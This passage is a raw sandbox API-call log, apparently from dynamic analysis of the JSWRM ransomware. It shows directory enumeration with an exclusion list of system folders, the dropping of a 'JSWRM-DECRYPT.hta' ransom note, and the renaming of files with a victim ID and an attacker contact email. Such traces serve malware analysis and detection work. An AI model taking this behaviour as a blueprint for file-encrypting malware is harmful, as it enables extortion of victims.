(lpString1="oskclearui", lpString2=".") returned 1 [0068.115] lstrcmpiW (lpString1="oskclearui", lpString2="..") returned 1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="...") returned 1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="windows") returned -1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="recovery") returned -1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="perflogs") returned -1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="documents and settings") returned 1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="$RECYCLE.BIN") returned 1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="system volume information") returned -1 [0068.116] lstrcmpiW (lpString1="oskclearui", lpString2="msocache") returned 1 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\jswrm-decrypt.hta")) returned 0xffffffff [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0068.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.117] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.117] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.118] CloseHandle (hObject=0x458) returned 1 [0068.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0068.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0068.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\jswrm-decrypt.hta")) returned 0x20 [0068.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0068.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.119] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f43e891, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232200 [0068.119] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.119] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f43e891, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.120] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f43e891, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f43e891, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f43e891, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.120] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.121] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearuibase.xml", cAlternateFileName="")) returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2=".") returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="..") returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="...") returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="windows") returned -1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="recovery") returned -1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="perflogs") returned -1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="documents and settings") returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="system volume information") returned -1 [0068.121] lstrcmpiW (lpString1="oskclearuibase.xml", lpString2="msocache") returned 1 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearuibase.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearuibase.xml", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskclearuibase.xml", lpUsedDefaultChar=0x0) returned 18 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearuibase.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearuibase.xml", cchWideChar=18, lpMultiByteStr=0x2413a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskclearuibase.xml", lpUsedDefaultChar=0x0) returned 18 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.125] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9564342414460936) returned 0 [0068.125] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.125] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.125] CloseHandle (hObject=0xffffffff) returned 1 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0068.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x21b710 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21b710 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.126] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearuibase.xml", cAlternateFileName="")) returned 0 [0068.126] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.126] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2=".") returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="..") returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="...") returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="windows") returned -1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="recovery") returned -1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="perflogs") returned -1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="documents and settings") returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="system volume information") returned -1 [0068.126] lstrcmpiW (lpString1="oskclearui.xml", lpString2="msocache") returned 1 [0068.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearui.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearui.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskclearui.xml", lpUsedDefaultChar=0x0) returned 14 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearui.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskclearui.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskclearui.xml", lpUsedDefaultChar=0x0) returned 14 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.127] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080253886320960) returned 0 [0068.127] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.127] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.127] CloseHandle (hObject=0xffffffff) returned 1 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0068.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: 